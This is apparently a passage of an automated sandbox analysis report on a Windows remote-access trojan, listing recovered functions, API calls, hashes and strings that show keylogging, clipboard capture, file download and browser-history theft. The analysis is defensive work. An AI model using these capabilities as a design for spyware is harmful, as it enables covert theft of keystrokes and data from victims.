						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E105CB377();
					_t102 = 0x16;
					 *_t69 = _t102;
					E105C77D0();
					goto L11;
				}
				_t71 = E105CB377();
				_t103 = 0x16;
				 *_t71 = _t103;
				E105C77D0();
				return _t103;
			}
































                                    0x105cd2fd
                                    0x105cd302
                                    0x105cd322
                                    0x105cd323
                                    0x105cd325
                                    0x105cd328
                                    0x105cd32a
                                    0x105cd33d
                                    0x105cd340
                                    0x105cd342
                                    0x105cd345
                                    0x105cd348
                                    0x105cd34b
                                    0x105cd356
                                    0x105cd358
                                    0x105cd359
                                    0x105cd35b
                                    0x105cd377
                                    0x105cd37b
                                    0x105cd384
                                    0x105cd389
                                    0x105cd390
                                    0x105cd39d
                                    0x105cd3a2
                                    0x105cd3ac
                                    0x105cd3b1
                                    0x105cd3b6
                                    0x105cd3b8
                                    0x105cd3bf
                                    0x105cd3c1
                                    0x105cd3c1
                                    0x105cd3c6
                                    0x105cd3cb
                                    0x105cd3cc
                                    0x105cd3cf
                                    0x105cd3d7
                                    0x105cd3d7
                                    0x105cd3d8
                                    0x105cd3e6
                                    0x105cd3ee
                                    0x105cd3fb
                                    0x105cd3fc
                                    0x105cd406
                                    0x105cd40c
                                    0x105cd416
                                    0x105cd41d
                                    0x105cd421
                                    0x105cd425
                                    0x105cd42a
                                    0x105cd42e
                                    0x105cd436
                                    0x105cd436
                                    0x105cd438
                                    0x105cd43b
                                    0x00000000
                                    0x105cd3d1
                                    0x105cd3d1
                                    0x105cd3d1
                                    0x105cd3d2
                                    0x105cd3d2
                                    0x00000000
                                    0x105cd3d1
                                    0x105cd3cf
                                    0x105cd35d
                                    0x105cd366
                                    0x105cd366
                                    0x105cd36d
                                    0x105cd36e
                                    0x105cd370
                                    0x105cd370
                                    0x00000000
                                    0x105cd370
                                    0x105cd35f
                                    0x105cd364
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105cd364
                                    0x105cd34d
                                    0x00000000
                                    0x00000000
                                    0x105cd34f
                                    0x105cd354
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105cd354
                                    0x105cd32c
                                    0x105cd333
                                    0x105cd334
                                    0x105cd336
                                    0x00000000
                                    0x105cd336
                                    0x105cd304
                                    0x105cd30b
                                    0x105cd30c
                                    0x105cd30e
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 052967b5b448af53dc2c5bd8eef6940f52376eadd66e8ec4276b382b03b06a8d
                                    • Instruction ID: ba2521565587a9a7a1b7dddff424019dca9819baa4af973c09bfafb9b32bdc1a
                                    • Opcode Fuzzy Hash: 052967b5b448af53dc2c5bd8eef6940f52376eadd66e8ec4276b382b03b06a8d
                                    • Instruction Fuzzy Hash: 2C410771A00748EFD714AFB8CE49B9ABFBCEF84B10F10492AF141DB680D775A9018790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D4CAB, Relevance: 6.1, APIs: 4, Instructions: 128synchronizationthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0073C184), ref: 006D4D98
                                    • CreateThread.KERNEL32 ref: 006D4DAB
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,006D4C44,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 006D4DB6
                                    • CloseHandle.KERNEL32(00000000,?,?,006D4C44,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 006D4DBF
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 3360349984-0
                                    • Opcode ID: 8dac3ee3e0dd7a77853e91dc2a219457c5f340bc4e5ae6c9a51dec3431082ac0
                                    • Instruction ID: d8b0d6b30c4c7dc99c9e34874ee0da58b729f40a5d95547bf14d09a29207ec90
                                    • Opcode Fuzzy Hash: 8dac3ee3e0dd7a77853e91dc2a219457c5f340bc4e5ae6c9a51dec3431082ac0
                                    • Instruction Fuzzy Hash: A7414A71D00218AFCB50EBA4CC95DFEBBBEAF55320F04451AF852A7391DF34AA458B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DD211, Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006E7614: GetCurrentProcess.KERNEL32(?,?,?,006E80D1,WinDir,00000000,00000000), ref: 006E7625
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006DD231
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 006DD253
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 006DD3DA
                                    • CloseHandle.KERNEL32(00000000), ref: 006DD3E9
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 592884611-0
                                    • Opcode ID: 150fe2bbfd539675aab02460adbd6ea283668a270ef6a9a92cbef9a43cfe7d7d
                                    • Instruction ID: e410c89d69093fdf8f8e6e73bbfabef12ae3521cdba785a49a7d72907daa9947
                                    • Opcode Fuzzy Hash: 150fe2bbfd539675aab02460adbd6ea283668a270ef6a9a92cbef9a43cfe7d7d
                                    • Instruction Fuzzy Hash: 93414331D042189BC799F760DC92AEDB3B7AF55300F00419EB44997292EF705F89CE58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D8A51, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 82sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006E7ABF: GetForegroundWindow.USER32(76D26490,?), ref: 006E7ACF
                                      • Part of subcall function 006E7ABF: GetWindowTextLengthW.USER32(00000000), ref: 006E7AD8
                                      • Part of subcall function 006E7ABF: GetWindowTextW.USER32 ref: 006E7B02
                                    • Sleep.KERNEL32(000001F4), ref: 006D8AAF
                                    • Sleep.KERNEL32(00000064), ref: 006D8B49
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    • API String ID: 3309952895-93608704
                                    • Opcode ID: 47e20f47b91cb282ab6d32051159b5cadbaec335f82d88b1cc63c71806992c3b
                                    • Instruction ID: 7e665863cd2931eb0f094bded1c9a2bc743c6aaf18dc5ed3f0bc8d2b66cc4260
                                    • Opcode Fuzzy Hash: 47e20f47b91cb282ab6d32051159b5cadbaec335f82d88b1cc63c71806992c3b
                                    • Instruction Fuzzy Hash: F0210371E082006BC644F779EC2796E73AB9F92340F40043FF8425B3C2EE64AE05829A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070D288, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab2e7a222e93e98a421bf96e326815fa20e77d342c42a94e037700a28a22ee0d
                                    • Instruction ID: 27d0bb82b878722355dcbc892ce60cfd6200ab69811d0b3f616bac8e4485d529
                                    • Opcode Fuzzy Hash: ab2e7a222e93e98a421bf96e326815fa20e77d342c42a94e037700a28a22ee0d
                                    • Instruction Fuzzy Hash: B401A2B220931AFEE73126B86CC5FAB629DEF817B4B340735F221611D5DE6CCC404164
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070D307, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0aa46de5117be43cad65517e50d9dbf1a9dddae466c1b41a99d4df3d98de90fc
                                    • Instruction ID: f7a4b14437d06d181f4bcaedee01e8e6339fc5b57d840217072652e2ac2cdd4d
                                    • Opcode Fuzzy Hash: 0aa46de5117be43cad65517e50d9dbf1a9dddae466c1b41a99d4df3d98de90fc
                                    • Instruction Fuzzy Hash: 7E01D1B220A71AFEE73016B86CC5D6BA39CEF823B83214725F621922D1DA6C8C414161
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D8BC0, Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006D8C97), ref: 006D8BF6
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,006D8C97), ref: 006D8C05
                                    • Sleep.KERNEL32(00002710,?,?,?,006D8C97), ref: 006D8C32
                                    • CloseHandle.KERNEL32(00000000,?,?,?,006D8C97), ref: 006D8C39
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID:
                                    • API String ID: 1958988193-0
                                    • Opcode ID: f9450d4d90d6464d5d7e0ce75f6f267c65a901fbb91e32ad6cc3170c908bc0cb
                                    • Instruction ID: 96a5b028bacb7b97c402c60223da39821638b4fe520b40c2c712aa3125df6584
                                    • Opcode Fuzzy Hash: f9450d4d90d6464d5d7e0ce75f6f267c65a901fbb91e32ad6cc3170c908bc0cb
                                    • Instruction Fuzzy Hash: 6E113D30A02340EFEB3167249CCDA6E7A9FE745711F04841FE28157791CA19AD55837A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00712033, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00711FDA,?,00000000,00000000,00000000,?,00712306,00000006,FlsSetValue), ref: 00712065
                                    • GetLastError.KERNEL32(?,00711FDA,?,00000000,00000000,00000000,?,00712306,00000006,FlsSetValue,00729068,00729070,00000000,00000364,?,00711DB4), ref: 00712071
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00711FDA,?,00000000,00000000,00000000,?,00712306,00000006,FlsSetValue,00729068,00729070,00000000), ref: 0071207F
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 34f91cffe9f740d11591039d214c1598eec71e5719c59ab90aa698b41e041ffb
                                    • Instruction ID: 87adfa4ae846c1e49f0ff10089d3cb871d0ce6c963e6690f1c84412483ce4c38
                                    • Opcode Fuzzy Hash: 34f91cffe9f740d11591039d214c1598eec71e5719c59ab90aa698b41e041ffb
                                    • Instruction Fuzzy Hash: 3401F7367016279BCB314A7C9C459E77798EF48B617204720FA06D3281DB2CD963C6E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E79DC, Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E7A0D
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E7A32
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,006D4230,0072F464), ref: 006E7A40
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    • String ID:
                                    • API String ID: 3919263394-0
                                    • Opcode ID: cfe53f7a9a93ea89ac5b9f21cd4b5c9c75a388d182b9890ce7a513aa93b791a4
                                    • Instruction ID: 6ba4e66f763ba287e50d1559905b7946f794ed0236f3b8f204d180bee20dc964
                                    • Opcode Fuzzy Hash: cfe53f7a9a93ea89ac5b9f21cd4b5c9c75a388d182b9890ce7a513aa93b791a4
                                    • Instruction Fuzzy Hash: 9A01D670601208FFE7105B65AC89EBF77ADEB46364F10415AF800A3280DA384F029674
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00701D01, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00701D01
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00701D06
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00701D0B
                                      • Part of subcall function 00705195: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007051A6
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00701D20
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    • String ID:
                                    • API String ID: 1761009282-0
                                    • Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                                    • Instruction ID: a2666259cbeb8f6cfc1c347b688fb5e2be9e18cb9e7041aca351ca375cae7fb8
                                    • Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                                    • Instruction Fuzzy Hash: ABC04C28244549E0DC213770520F3AF13C55CA3384BE113C1A9611B5C3AE4D440B5D32
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070FFED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 0071007D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: d5c8959adb6661353797749dbdea6ac50cc49038361d16d74ea0a2a1a7a8fef0
                                    • Instruction ID: 877188af0cb066caaa6141502ddaf25517ab0b37cf0187e4741a49bd765f9458
                                    • Opcode Fuzzy Hash: d5c8959adb6661353797749dbdea6ac50cc49038361d16d74ea0a2a1a7a8fef0
                                    • Instruction Fuzzy Hash: A0515D61A48105E6C7227B5CDD013EA3BA0AB44B50F208D68F0C5422E9EB7D8CD5EADA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00717399, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00716F6C: GetOEMCP.KERNEL32(00000000,?,?,007171F5,?), ref: 00716F97
                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0071723A,?,00000000), ref: 0071740D
                                    • GetCPInfo.KERNEL32(00000000,:rq,?,?,?,0071723A,?,00000000), ref: 00717420
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID: :rq
                                    • API String ID: 546120528-3971408778
                                    • Opcode ID: 3197eb27c8248f84d54e18c2d7abcef45aa56496422ee58b6a4d7fcc1eb92abf
                                    • Instruction ID: 506d7644b54251e6dcf2fbe50cf829fade0e8ba6e7dac7486d0f63aad63f0794
                                    • Opcode Fuzzy Hash: 3197eb27c8248f84d54e18c2d7abcef45aa56496422ee58b6a4d7fcc1eb92abf
                                    • Instruction Fuzzy Hash: CC5128709082859EDB29CF7DC4456FABFF5AF41300F24816EE4968B1D1E73D9982CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070EE70, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: __alloca_probe_16__freea
                                    • String ID: :nn
                                    • API String ID: 1635606685-2278142754
                                    • Opcode ID: 9d5f5ce905b43f4e6e5cd744aa862beb782141c0c99b0188f1d36a7380144ea8
                                    • Instruction ID: cdb798a98d6817f33f2d34dd0ff3a12643f7689aa5c68154142b6f1a56b12f75
                                    • Opcode Fuzzy Hash: 9d5f5ce905b43f4e6e5cd744aa862beb782141c0c99b0188f1d36a7380144ea8
                                    • Instruction Fuzzy Hash: 3B41F771600216EBDB20AF64CC45EAEB7E5EF45720F244B29F804DB2C1EB3CE9408792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00717044, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00717069
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Info
                                    • String ID: $vuq
                                    • API String ID: 1807457897-226834571
                                    • Opcode ID: 1dfe0bf8d88a27af27b579613e17a5e5eda0863cfc3e86197d00f64e1ae30d17
                                    • Instruction ID: a1ab1b9b8f4c0e338468bf2ac2c528f3a069b6760a18a01e3c5cd6cc5b5bdecf
                                    • Opcode Fuzzy Hash: 1dfe0bf8d88a27af27b579613e17a5e5eda0863cfc3e86197d00f64e1ae30d17
                                    • Instruction Fuzzy Hash: C2410B7050834CAEDF298E6CCC85BF6BBB9DB45704F2404EDE58A87182D2399AC5DF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D414D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006D4167
                                      • Part of subcall function 006E7093: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,006D417D), ref: 006E70BA
                                      • Part of subcall function 006E432B: CloseHandle.KERNEL32(006D41F6,?,006D41F6,0072F464), ref: 006E4341
                                      • Part of subcall function 006E432B: CloseHandle.KERNEL32(0072F464,?,006D41F6,0072F464), ref: 006E434A
                                      • Part of subcall function 006E79DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • Sleep.KERNEL32(000000FA,0072F464), ref: 006D4239
                                    Strings
                                    • /sort "Visit Time" /stext ", xrefs: 006D41B3
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "
                                    • API String ID: 368326130-1573945896
                                    • Opcode ID: 2c1b8322bb92247e08335f9b18bc67444ed826305fcde06030a599fcb6dd4ef7
                                    • Instruction ID: 45cf027d82fc3a4ee6bcfa9dae519f2be5084b414311c619651dfcc870624545
                                    • Opcode Fuzzy Hash: 2c1b8322bb92247e08335f9b18bc67444ed826305fcde06030a599fcb6dd4ef7
                                    • Instruction Fuzzy Hash: 9A316631E141186BCB54FBB4DC96DED7777AF91300F40006EF40697292EE701E4AC654
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D9C15, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006FF49E: __onexit.LIBCMT ref: 006FF4A4
                                    • __Init_thread_footer.LIBCMT ref: 006D9C64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    • API String ID: 1881088180-3686566968
                                    • Opcode ID: 9da52095f010911e51716a65203ca78f7e30fa7f3c698d9a08d8852f4fe7b65c
                                    • Instruction ID: d7765e0cde96ad752c95df0473d07e959bc5a3235488f53ffd0393f05d148784
                                    • Opcode Fuzzy Hash: 9da52095f010911e51716a65203ca78f7e30fa7f3c698d9a08d8852f4fe7b65c
                                    • Instruction Fuzzy Hash: 5D214F31E1421C5ACB54FBA4E8929EDB3BBAF55310F40017FE90657393EF346D4A86A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00719DB7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0071A012,?,00000050,?,?,?,?,?), ref: 00719E92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    • Opcode ID: 38c5022b2984609401f31597b44e7e761aec09bd6005a77a03d29bd338271778
                                    • Instruction ID: 18a9b00a822279c89be0f1556760d7570c61071e25c62e3526822a0b49661473
                                    • Opcode Fuzzy Hash: 38c5022b2984609401f31597b44e7e761aec09bd6005a77a03d29bd338271778
                                    • Instruction Fuzzy Hash: 19218663B00104E6DB34CE6DC961BD7729AAB64F51F5A4424EB09D7284E73ADEC7C390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D4A08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • connect.WS2_32(?,0073DBA0,00000010), ref: 006D4A23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: connect
                                    • String ID: TLS Authentication failed$[ERROR]
                                    • API String ID: 1959786783-1964023390
                                    • Opcode ID: 0d2c74ac9d9c60d67d932d9075aa666b9f04863cd2df19084426f329880e3dfb
                                    • Instruction ID: 3d6c5204c16d73c2db8183cb7aeed645bf8c99bdd1dab36b1cce3f5a9f37f8a4
                                    • Opcode Fuzzy Hash: 0d2c74ac9d9c60d67d932d9075aa666b9f04863cd2df19084426f329880e3dfb
                                    • Instruction Fuzzy Hash: 65010431A402009BDF18BFA5D9969BA3B6B9F41350B08405BED058F34BEE62DC01C7A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E2A86, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60sleepfilenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000064), ref: 006E2A88
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 006E2AEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: 8Em
                                    • API String ID: 1931167962-1798622111
                                    • Opcode ID: 5188389298d5bbfff21fdfb060766d9094f102661905497e3f72cc0c188c88ba
                                    • Instruction ID: 6d4cf6cc428aca1ab4000633c58f929bbf3c69ee2a8ab372c7880f07a9b27051
                                    • Opcode Fuzzy Hash: 5188389298d5bbfff21fdfb060766d9094f102661905497e3f72cc0c188c88ba
                                    • Instruction Fuzzy Hash: 1C11B671908340ABD654FB71D8969BE739BAB55300F40081FB5468A292EF749A08C616
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D95A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    • UnhookWindowsHookEx.USER32(?), ref: 006D961F
                                      • Part of subcall function 006D9634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9634: wsprintfW.USER32 ref: 006D96C3
                                      • Part of subcall function 006D9634: SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: EventHookLocalTimeUnhookWindowswsprintf
                                    • String ID: Offline Keylogger Stopped$[Info]
                                    • API String ID: 2949427887-1791908007
                                    • Opcode ID: 659a1451e6504ce4ea202c65daca7df24c7ba747326234c3ed7f7f2d3f03acd0
                                    • Instruction ID: ec6808751265a73d66e79390c4a184991e198286ac75f70d625cf7468f9c7296
                                    • Opcode Fuzzy Hash: 659a1451e6504ce4ea202c65daca7df24c7ba747326234c3ed7f7f2d3f03acd0
                                    • Instruction Fuzzy Hash: DE012821E0424157EB357738D80B3FEBBB78B52300F44006FE98112393DA795946C7EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007125B3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,?p,00000000,00000001,?,?,0070E33F,?,?,0070DD1F,?,00000004), ref: 007125FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: ?p$IsValidLocaleName
                                    • API String ID: 1901932003-1320801076
                                    • Opcode ID: 38752900e5fd543d55b30f36353e0d92fd9105ccf452b413cbc3b2d59a7556e5
                                    • Instruction ID: 6e344374ef51eabedcb30a204c2a5a0a8a24f03cb16fa839bc07077448330a65
                                    • Opcode Fuzzy Hash: 38752900e5fd543d55b30f36353e0d92fd9105ccf452b413cbc3b2d59a7556e5
                                    • Instruction Fuzzy Hash: 19F0593068061CB7C7306B24AC07FED7B54DF04711F008065FE016A2C1DA7D0E52958D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

